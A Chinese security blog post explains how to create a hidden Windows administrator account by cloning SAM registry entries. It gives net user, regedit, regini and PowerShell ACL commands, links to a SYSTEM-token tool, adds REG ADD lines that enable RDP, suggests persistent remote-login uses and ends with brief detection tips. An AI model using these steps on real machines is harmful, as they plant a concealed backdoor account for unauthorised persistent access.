<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script> 
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">













<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.5.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=6.5.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico?v=6.5.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.5.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.5.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="简介本文要介绍的内容是：  帐户隐藏的方法 编写脚本实现思路 结合远程桌面多用户登录的利用思路  帐户隐藏的方法测试系统：win7x86 1.对注册表赋予权限默认注册表HKEY_LOCAL_MACHINE\SAM\SAM\只有system权限才能修改 现在需要为其添加管理员权限 右键-权限-选中Administrators，允许完全控制  重新启动注册表regedit.exe，获得对该键值的修改权">
<meta property="og:type" content="article">
<meta property="og:title" content="windows系统账户隐藏">
<meta property="og:url" content="http://yoursite.com/2019/01/07/windows系统账户隐藏/index.html">
<meta property="og:site_name" content="guolala&#39;s blog">
<meta property="og:description" content="简介本文要介绍的内容是：  帐户隐藏的方法 编写脚本实现思路 结合远程桌面多用户登录的利用思路  帐户隐藏的方法测试系统：win7x86 1.对注册表赋予权限默认注册表HKEY_LOCAL_MACHINE\SAM\SAM\只有system权限才能修改 现在需要为其添加管理员权限 右键-权限-选中Administrators，允许完全控制  重新启动注册表regedit.exe，获得对该键值的修改权">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvbpx1odj30le0bwwfk.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvcvhb73j30h7079q2y.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvd78ii0j30jd09tabk.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvhxw0tpj30oy0azwfa.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvibcf64j30i80biweu.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvj19bf6j30ii07x3yq.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvjzof41j30i20fx3yv.jpg">
<meta property="og:updated_time" content="2019-01-07T04:01:54.132Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="windows系统账户隐藏">
<meta name="twitter:description" content="简介本文要介绍的内容是：  帐户隐藏的方法 编写脚本实现思路 结合远程桌面多用户登录的利用思路  帐户隐藏的方法测试系统：win7x86 1.对注册表赋予权限默认注册表HKEY_LOCAL_MACHINE\SAM\SAM\只有system权限才能修改 现在需要为其添加管理员权限 右键-权限-选中Administrators，允许完全控制  重新启动注册表regedit.exe，获得对该键值的修改权">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvbpx1odj30le0bwwfk.jpg">



  <link rel="alternate" href="/atom.xml" title="guolala's blog" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2019/01/07/windows系统账户隐藏/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>windows系统账户隐藏 | guolala's blog</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>
<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">guolala's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">情迷不意乱</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/01/07/windows系统账户隐藏/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="guolala">
      <meta itemprop="description" content="growing up">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="guolala's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">windows系统账户隐藏
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-01-07 11:36:50 / 修改时间：12:01:54" itemprop="dateCreated datePublished" datetime="2019-01-07T11:36:50+08:00">2019-01-07</time>
            

            
              

              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/骚操作/" itemprop="url" rel="index"><span itemprop="name">骚操作</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>本文要介绍的内容是：</p>
<ul>
<li>帐户隐藏的方法</li>
<li>编写脚本实现思路</li>
<li>结合远程桌面多用户登录的利用思路</li>
</ul>
<h1 id="帐户隐藏的方法"><a href="#帐户隐藏的方法" class="headerlink" title="帐户隐藏的方法"></a>帐户隐藏的方法</h1><p>测试系统：win7x86</p>
<h2 id="1-对注册表赋予权限"><a href="#1-对注册表赋予权限" class="headerlink" title="1.对注册表赋予权限"></a>1.对注册表赋予权限</h2><p>默认注册表<code>HKEY_LOCAL_MACHINE\SAM\SAM\</code>只有system权限才能修改</p>
<p>现在需要为其添加管理员权限</p>
<p>右键-权限-选中Administrators，允许完全控制</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvbpx1odj30le0bwwfk.jpg" alt=""></p>
<p>重新启动注册表regedit.exe，获得对该键值的修改权限</p>
<h2 id="2、新建特殊帐户"><a href="#2、新建特殊帐户" class="headerlink" title="2、新建特殊帐户"></a>2、新建特殊帐户</h2><pre><code>net user test$ 123456 /add
net localgroup administrators test$ /add
</code></pre><p>用户名要以$结尾</p>
<p>添加后，该帐户可在一定条件下隐藏，输入net user无法获取</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvcvhb73j30h7079q2y.jpg" alt=""></p>
<p>但是，在控制面板能够发现该帐户</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvd78ii0j30jd09tabk.jpg" alt=""></p>
<h2 id="3、导出注册表"><a href="#3、导出注册表" class="headerlink" title="3、导出注册表"></a>3、导出注册表</h2><p>在注册表<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names</code>下找到新建的帐户test$</p>
<p>获取默认类型为0x3ea</p>
<p>将注册表<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$</code>导出为1.reg</p>
<p>在注册表下能够找到对应类型名称的注册表项<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA</code></p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvhxw0tpj30oy0azwfa.jpg" alt=""></p>
<p>右键将该键导出为2.reg，保存的文件信息如下图</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvibcf64j30i80biweu.jpg" alt=""></p>
<p>默认情况下，管理员帐户Administrator对应的注册表键值为<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4</code></p>
<p>同样，右键将该键导出为3.reg</p>
<p>将注册表项<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA</code>下键F的值替换为<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4</code>下键F的值，即2.reg中键F的值替换成3.reg中键F的值</p>
<p>替换后，如下图</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvj19bf6j30ii07x3yq.jpg" alt=""></p>
<h2 id="4、命令行删除特殊帐户"><a href="#4、命令行删除特殊帐户" class="headerlink" title="4、命令行删除特殊帐户"></a>4、命令行删除特殊帐户</h2><pre><code>net user test$ /del
</code></pre><h2 id="5、导入reg文件"><a href="#5、导入reg文件" class="headerlink" title="5、导入reg文件"></a>5、导入reg文件</h2><pre><code>regedit /s 1.reg
regedit /s 2.reg
</code></pre><p>隐藏账户制做完成，控制面板不存在帐户test$</p>
<p>通过net user无法列出该帐户</p>
<p>计算机管理-本地用户和组-用户也无法列出该帐户</p>
<p>但可通过如下方式查看：</p>
<pre><code>net user test$
</code></pre><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyxvjzof41j30i20fx3yv.jpg" alt=""></p>
<p>无法通过net user test$ /del删除该用户，提示用户不属于此组</p>
<p><strong>删除方法：</strong></p>
<p>删除注册表<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\</code>下对应帐户的键值(共有两处)</p>
<blockquote>
<p>工具HideAdmin能自动实现以上的创建和删除操作</p>
</blockquote>
<h1 id="编写脚本"><a href="#编写脚本" class="headerlink" title="编写脚本"></a>编写脚本</h1><h2 id="对注册表添加管理员帐户的编辑权限"><a href="#对注册表添加管理员帐户的编辑权限" class="headerlink" title="对注册表添加管理员帐户的编辑权限"></a>对注册表添加管理员帐户的编辑权限</h2><p>使用regini注册ini文件为注册表及其子键赋予权限</p>
<p>Powershell通过Set-Acl为注册表赋予权限</p>
<pre><code>$acl = Get-Acl HKLM:SAM\SAM\
$person = [System.Security.Principal.NTAccount]&quot;Administrators&quot;
$access = [System.Security.AccessControl.RegistryRights]&quot;FullControl&quot;
$inheritance = [System.Security.AccessControl.InheritanceFlags]&quot;None&quot;
$propagation = [System.Security.AccessControl.PropagationFlags]&quot;NoPropagateInherit&quot;
$type = [System.Security.AccessControl.AccessControlType]&quot;Allow&quot;
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.ResetAccessRule($rule)
Set-Acl HKLM:SAM\SAM\Domains\Account\Users\Names $acl
</code></pre><p>但不支持对子键的权限分配，因此不采用该方法</p>
<p>以下内容保存为a.ini:</p>
<pre><code>HKEY_LOCAL_MACHINE\SAM\SAM\* [1 17]
</code></pre><p>*代表枚举所有子键</p>
<p>1代表Administrators 完全访问</p>
<p>17代表System 完全访问</p>
<p>详细权限说明可通过cmd执行regini获取帮助</p>
<p>通过regini注册:</p>
<pre><code>regini  a.ini
</code></pre><p>Evilcg就是通过这种方式实现的，脚本地址：</p>
<p><a href="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1" target="_blank" rel="noopener">https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1</a></p>
<p>使用*需要system权限,但只把相关的列举出来，只需要管理员权限即可，例如：</p>
<pre><code>HKEY_LOCAL_MACHINE\SAM [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]
</code></pre><h2 id="直接获得System权限"><a href="#直接获得System权限" class="headerlink" title="直接获得System权限"></a>直接获得System权限</h2><p>以先获得System权限，进而拥有对注册表的编辑权限</p>
<p>简单的方式，通过Invoke-TokenManipulation.ps1，地址如下：</p>
<p><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1" target="_blank" rel="noopener">https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1</a></p>
<p>但是有一个bug，就是用<code>Invoke-TokenManipulation -ImpersonateUser -Username &quot;nt authority\system&quot;</code>无法将当前权限切换为System权限</p>
<p>但可以使用<code>Invoke-TokenManipulation -CreateProcess &quot;cmd.exe&quot; -Username &quot;nt authority\system&quot;</code>新打开一个System权限的进程</p>
<p>接下来，就是编写脚本实现注册表的导出替换功能：</p>
<ul>
<li>新建测试帐户</li>
<li>将注册表导出到temp目录，进行替换</li>
<li>删除特殊帐户</li>
<li>导入注册表文件</li>
</ul>
<p>优化版本：</p>
<p><a href="https://github.com/3gstudent/Windows-User-Clone" target="_blank" rel="noopener">https://github.com/3gstudent/Windows-User-Clone</a></p>
<h1 id="结合远程桌面多用户登录的利用思路"><a href="#结合远程桌面多用户登录的利用思路" class="headerlink" title="结合远程桌面多用户登录的利用思路"></a>结合远程桌面多用户登录的利用思路</h1><p>通过克隆的方式能够继承原帐户的权限</p>
<p>在利用上存在以下需要注意的问题：</p>
<h2 id="1、复制管理员帐户Administrator"><a href="#1、复制管理员帐户Administrator" class="headerlink" title="1、复制管理员帐户Administrator"></a>1、复制管理员帐户Administrator</h2><p>需要注意管理员帐户是否被禁用，如果被禁用，那么克隆出的隐藏帐户也是被禁用状态</p>
<h2 id="2、复制已有帐户"><a href="#2、复制已有帐户" class="headerlink" title="2、复制已有帐户"></a>2、复制已有帐户</h2><p>在3389远程登录的利用上存在相同帐户的冲突关系</p>
<p>通过cmd开启本机的3389远程登录功能：</p>
<pre><code>REG ADD &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v PortNumber /t REG_DWORD /d 0x00000d3d /f
</code></pre><p>利用以上方法，克隆帐户a的权限，建立隐藏帐户aaa$</p>
<p>如果系统当前登录帐号为a，那么使用隐藏帐户aaa$登录的话，会系统被识别为帐户a，导致帐户a下线</p>
<h2 id="3、新建帐户再复制"><a href="#3、新建帐户再复制" class="headerlink" title="3、新建帐户再复制"></a>3、新建帐户再复制</h2><p>进一步，大胆的思考</p>
<p>新建管理员帐户b，克隆帐户b，建立隐藏账户bbb$</p>
<p>删除管理员帐户b，隐藏账户bbb$仍然有效</p>
<h2 id="4、原帐户的维持"><a href="#4、原帐户的维持" class="headerlink" title="4、原帐户的维持"></a>4、原帐户的维持</h2><p>再进一步</p>
<p>克隆帐户a的权限，建立隐藏帐户aaa$</p>
<p>修改帐户a的密码，隐藏帐户aaa$仍然有效</p>
<h1 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h1><p>针对隐藏帐户的利用，查看注册表<code>HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\</code>即可</p>
<p>当然，默认管理员权限无法查看，需要分配权限或是提升至Sytem权限</p>
<p>隐藏帐户的登录记录，可通过查看日志获取</p>

      
    </div>

    

    
    
    

    

    
       
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/07/内网渗透知识点总结/" rel="next" title="内网渗透知识点总结">
                <i class="fa fa-chevron-left"></i> 内网渗透知识点总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/08/CVE-2017-12615-Tomcat任意文件上传漏洞/" rel="prev" title="CVE-2017-12615 Tomcat任意文件上传漏洞">
                CVE-2017-12615 Tomcat任意文件上传漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="guolala">
            
              <p class="site-author-name" itemprop="name">guolala</p>
              <p class="site-description motion-element" itemprop="description">growing up</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">48</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">24</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://weibo.com/6791921870/" title="Weibo &rarr; https://weibo.com/6791921870/" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#简介"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#帐户隐藏的方法"><span class="nav-number">2.</span> <span class="nav-text">帐户隐藏的方法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-对注册表赋予权限"><span class="nav-number">2.1.</span> <span class="nav-text">1.对注册表赋予权限</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、新建特殊帐户"><span class="nav-number">2.2.</span> <span class="nav-text">2、新建特殊帐户</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、导出注册表"><span class="nav-number">2.3.</span> <span class="nav-text">3、导出注册表</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4、命令行删除特殊帐户"><span class="nav-number">2.4.</span> <span class="nav-text">4、命令行删除特殊帐户</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5、导入reg文件"><span class="nav-number">2.5.</span> <span class="nav-text">5、导入reg文件</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#编写脚本"><span class="nav-number">3.</span> <span class="nav-text">编写脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#对注册表添加管理员帐户的编辑权限"><span class="nav-number">3.1.</span> <span class="nav-text">对注册表添加管理员帐户的编辑权限</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#直接获得System权限"><span class="nav-number">3.2.</span> <span class="nav-text">直接获得System权限</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#结合远程桌面多用户登录的利用思路"><span class="nav-number">4.</span> <span class="nav-text">结合远程桌面多用户登录的利用思路</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1、复制管理员帐户Administrator"><span class="nav-number">4.1.</span> <span class="nav-text">1、复制管理员帐户Administrator</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、复制已有帐户"><span class="nav-number">4.2.</span> <span class="nav-text">2、复制已有帐户</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、新建帐户再复制"><span class="nav-number">4.3.</span> <span class="nav-text">3、新建帐户再复制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4、原帐户的维持"><span class="nav-number">4.4.</span> <span class="nav-text">4、原帐户的维持</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#防御"><span class="nav-number">5.</span> <span class="nav-text">防御</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart" id="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guolala</span>

  

  
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v6.5.0</div>


-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
  </script>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
        
      
  
  <script type="text/javascript" color="0,0,255" opacity="0.5" zindex="-1" count="99" src="true"></script>













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.5.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.5.0"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
